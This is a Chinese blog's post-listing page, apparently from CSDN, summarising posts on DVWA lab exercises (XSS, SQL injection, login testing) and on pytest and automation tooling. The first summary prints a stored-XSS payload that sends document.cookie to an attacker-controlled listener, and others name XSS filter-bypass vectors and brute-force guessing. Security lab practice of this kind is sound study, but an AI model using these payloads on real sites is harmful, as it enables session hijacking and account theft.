- 博客(32)
- 收藏
- 关注
RSS订阅原创 使用存储型 XSS 窃取 cookie 并发送到你控制的服务器
📌 DVWA存储型XSS窃取Cookie实验步骤 1️⃣ 搭建监听服务 使用Python启动HTTP服务器(端口8081)或Flask应用接收数据 确保防火墙开放端口 2️⃣ 注入恶意脚本 在DVWA的存储型XSS页面提交Payload: new Image().src="http://监听IP:8081/log?c="+document.cookie; 注意替换IP地址(容器环境需用特殊地址) 3️⃣ 获取Cookie 访问含XSS的页面触发脚本 监听终端将显示窃取的Cookie信息(如PHPSESSI
2025-06-15 11:38:50
212
原创 DOM-Based XSS(基于文档对象模型的跨站脚本攻击)
DOM XSS攻击分析及DVWA环境实践 摘要:本文介绍了DOM型XSS漏洞的原理,通过DVWA靶场进行实践演示。DOM XSS不同于传统反射/存储型XSS,它通过恶意篡改URL参数,利用前端JavaScript未经处理的动态插入实现攻击。文章详细展示了在DVWA环境中利用default参数注入<script>alert('XSS')</script>等恶意代码的过程,并解析了漏洞成因——未过滤URL参数直接插入HTML。还提供了多种绕过WAF的payload示例,包括隐形脚本和on
2025-06-15 10:06:25
212
原创 Stored XSS(存储型跨站脚本攻击)
这篇教程展示了如何在DVWA环境中进行存储型XSS攻击测试。首先进入XSS存储型漏洞页面,在留言板表单中输入包含<script>alert('Stored XSS')</script>的payload,提交后验证脚本是否持久存储。接着介绍了三种绕过过滤的变种XSS payload:利用img标签的onerror事件、svg标签的onload事件,以及javascript伪协议的a链接。每次攻击成功后页面都会弹出提示框,证明漏洞存在。该实验主要帮助理解存储型XSS的特点和常见绕过方法。
2025-06-13 11:48:09
204
原创 XSS (Reflected)-反射型XSS
摘要: 通过DVWA的反射型XSS漏洞实验,验证了未过滤用户输入的危险性。测试使用<script>alert('XSS')</script>等基础payload可触发弹窗,并确认攻击代码被直接反射到URL和页面中。进一步尝试了<img src=x onerror=alert>、SVG事件和javascript伪协议等绕过方式,均成功执行。实验证明该页面缺乏输入过滤和输出编码,存在典型反射型XSS漏洞。建议实施HTML实体编码等防御措施。 (字数:149)
2025-06-13 10:41:39
288
原创 SQL 注入(SQL Injection)
摘要:本文介绍了如何使用DVWA(Damn Vulnerable Web Application)进行SQL注入练习。首先通过Docker部署DVWA环境并设置低安全级别,然后演示了基础SQL注入操作,包括查看用户信息和执行逻辑漏洞注入。文章提供了多种SQL注入语句示例,并建议后续可尝试提高安全等级或使用sqlmap工具进行自动化测试。最后推荐探索DVWA的其他漏洞模块如XSS和命令注入等。操作步骤包含清晰的命令和截图,适合网络安全学习者实践。
2025-06-11 11:29:38
454
原创 pytest自动化中关于使用fixture是否影响用例的独立性
只要 fixture 是“每个用例都能独立用”的工具,它就是帮助测试保持独立的;只有当它变成“多个测试共用的状态容器”,才会破坏独立性。scope=“session” 本身不是坏事,但如果 fixture 中包含用户态、系统态、会变的内容,就可能导致耦合问题。配置类 OK,状态类要谨慎。
2025-04-17 19:39:16
781
原创 对一个 Web 登录页面进行安全测试
使用 Burp Suite 的 Intruder 模块尝试多次猜密码(如字典攻击)如果没有加 HttpOnly 或 Secure,说明会话容易被劫持。可能使用 PHP + MySQL(通过响应头或页面信息猜测)如果不加验证码就能登录进去了,说明存在 SQL 注入。应该统一提示:“用户名或密码错误”,防止用户枚举。测试目标:登录功能是否安全。如果能访问说明存在越权漏洞。Session 是否安全?登录后是否存在越权问题?是否防 SQL 注入?是否使用 HTTPS?是否有暴力破解防护?
2025-04-16 18:48:09
516
原创 了解一下安全测试的流程
工具推荐:Burp Suite、OWASP ZAP、Nikto、Postman + jwt.io、SQLMap。工具推荐:Nmap、WhatWeb、Shodan。
2025-04-15 22:29:08
294
原创 了解一下安全测试
安全测试(Security Testing) 是软件测试的一种,旨在发现系统中的安全漏洞,确保系统数据和资源不会被未经授权的用户访问或篡改。
2025-04-15 22:20:51
505
原创 了解性能测试7个标准步骤
1️⃣ 明确目标 ➝2️⃣ 设计场景 ➝3️⃣ 编写脚本(JMX)➝4️⃣ 设置线程组参数 ➝5️⃣ 压测运行 ➝6️⃣ 收集分析报告 ➝7️⃣ 定位瓶颈 + 调优。
2025-04-09 16:08:29
450
原创 大数据测试案例:用户行为日志分析系统测试
1. 数据完整性:确保所有日志数据都成功存入HDFS。 2. 数据准确性:确保日志数据的转换和清洗符合规则。 3. 查询性能:确保Hive查询能在规定时间内返回结果。 4. 兼容性测试:支持多种日志格式,如JSON、CSV、Parquet。
2025-04-01 19:40:53
494
原创 了解大数据测试
大数据测试不仅仅是“更大规模的数据测试”,它涵盖了更复杂的系统、更高的性能要求和更强的安全保障。掌握合适的工具、制定有效的测试策略,是确保大数据平台稳定、可靠运行的关键。
2025-04-01 19:31:53
308
原创 了解测试计划
本测试计划旨在验证[项目名称]的功能和性能,确保其符合需求规范。测试计划的编写要详尽且清晰,确保团队所有成员都能理解并执行。根据项目需求和团队的具体情况,灵活调整模板内容和结构。
2024-10-10 17:28:51
295
原创 测试用例设计合理且有效
清晰的输入: 明确测试用例的输入数据和操作步骤。预期结果: 详细描述每一步的预期结果,避免模糊不清或多义性。步骤可重复: 测试用例的执行步骤应明确且可重复,保证不同测试人员执行时结果一致。
2024-09-11 21:22:46
374
原创 使用 Selenium 构建的 BasePage 类
使用 Selenium 封装一个基础页面类 BasePage,并展示它的基本功能,包括初始化浏览器、打开网页、查找元素、点击操作、输入文本以及异常处理等。通过封装 BasePage 类,可以更好地复用浏览器操作,提高测试脚本的可维护性和可读性。你可以根据项目需求进一步扩展这个基类,添加更多的通用方法。
2024-09-05 18:39:12
491
原创 pytest中pytest_terminal_summary统计测试执行的情况并生成总结描述
在测试执行结束时生成汇总报告。终端控制台输出:发送到企业微信的结果:init 方法:接收 TerminalReporter 实例并存储在实例变量中。generate_summary 方法:生成测试结果的总结,包括计算统计信息、格式化输出和发送到企业微信。创建 CustomSummaryReporter 实例,并调用 generate_summary 方法以打印总结和发送通知。这种方式将逻辑封装在 CustomSummaryReporter 类中,使得代码更具模块性和可维护性,并且在 pytest_
2024-09-05 12:42:09
648
原创 pytest中fixtrue和测试用例之间共享状态或数据
request.session 需要在 fixture 中显式定义和初始化,通常是一个字典或自定义对象。在你的示例代码中,request.session 是用来存储 recordid 的,以便在测试用例和 fixture 之间共享数据。
2024-09-02 22:08:08
1277
1
原创 pytest中用装饰器控制新增接口请求时间
这里使用一个自定义的装饰器 rate_limit,通过 pytest 管理测试流程,更加优雅和可扩展。
2024-09-02 18:10:37
626
原创 如何设计和优化一个基础的接口自动化测试框架(基于 Python + Pytest)
本文介绍了如何使用Python+Pytest构建可复用的接口自动化测试框架。通过封装BaseAPI类实现HTTP请求方法(GET/POST/PUT/DETELE)的统一管理,使用Pytest Fixture提供全局API实例,并展示了基础测试用例编写方法。文章还提供了进阶优化建议,包括异常处理、日志记录、环境切换支持等,并推荐了标准目录结构。最后强调自动化测试框架需要持续迭代,可逐步集成测试报告、数据驱动、Mock接口等功能。该框架具有代码复用率高、结构清晰、易于扩展的特点,能有效提升接口测试效率。
2024-08-28 15:40:47
305
原创 conftest.py详解:pytest中测试配置的核心文件(含 Fixture、钩子函数、插件)
功能说明✅ Fixture 定义用于共享测试前置条件(如登录、token、数据库连接等)✅ Hook 实现用于在测试运行前后执行一些操作(如生成自定义报告)✅ 插件注入可以作为本地插件生效,实现功能扩展(如统计执行时间)自动加载:不需要 import,pytest 会自动识别并加载当前路径及其子路径下的 conftest.py作用范围:当前目录及其所有子目录生效无需显式调用:定义的 fixture 可直接在测试用例中作为参数调用。
2024-06-26 15:46:12
811
原创 Expect 脚本:一键登录服务器并查看日志(含关键词搜索)
Expect是基于 Tcl 语言开发的一种自动交互工具,主要用于自动化命令行交互操作。自动登录 SSH / FTP自动化安装与配置自动测试需要输入的命令行程序自动执行远程任务我们来实现一个自动化脚本:自动通过 SSH 登录服务器根据参数查看不同服务的日志支持按关键词搜索(默认显示日志尾部)可实时追踪日志(tail -f)bash# 参数解析# 第一个参数:服务名# 第二个参数:环境/类型# 第三个参数:关键词(可选)# SSH连接远程服务器。
2024-06-18 15:02:12
575
原创 Pytest + Allure 实现接口自动化测试(含 YAML 参数化)
本文以视图数据列表查询接口为例,介绍了使用Pytest+Allure+YAML实现接口自动化测试的完整流程。通过封装RecordList类处理接口请求,利用YAML文件管理测试数据,编写参数化测试用例,并生成详细的Allure测试报告。该方法实现了批量参数化执行和结果可视化,为类似列表类接口的自动化测试提供了可复用的解决方案。项目结构清晰,包含配置、测试、封装和报告等模块,具有较好的工程实践价值。
2024-06-17 15:46:36
244
原创 pytest调试技巧:用 --pdb 参数快速定位问题
pdb 是 pytest 提供的调试选项。它的作用是:当某个测试用例发生异常(如断言失败或运行时错误)时,pytest 会自动中断并进入 Python的交互式调试模式(pdb),你可以在终端中手动检查变量、执行语句、定位错误原因。调试方式用途–pdb当测试失败时进入调试–trace从头开始逐步调试每一行p / pp打印变量的值c快速退出调试继续跑用例。
2023-11-12 03:13:47
548
原创 2021-04-06
1. pytest失败重跑安装pytest-rerunfailuresreruns为失败用例的重跑次数,reruns_delay为间隔时间如下例子,2个用例失败,重跑4次,一共执行6次
2021-04-06 15:38:31
91
原创 2021-03-16
centos安装docker1.安装需要的软件包yum install -y yum-utils device-mapper-persistent-data lvm22.添加yum源yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo3.更新yum缓存yum makecache fast4.查看仓库中docker的版本yum lis
2021-03-16 16:00:00
66
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人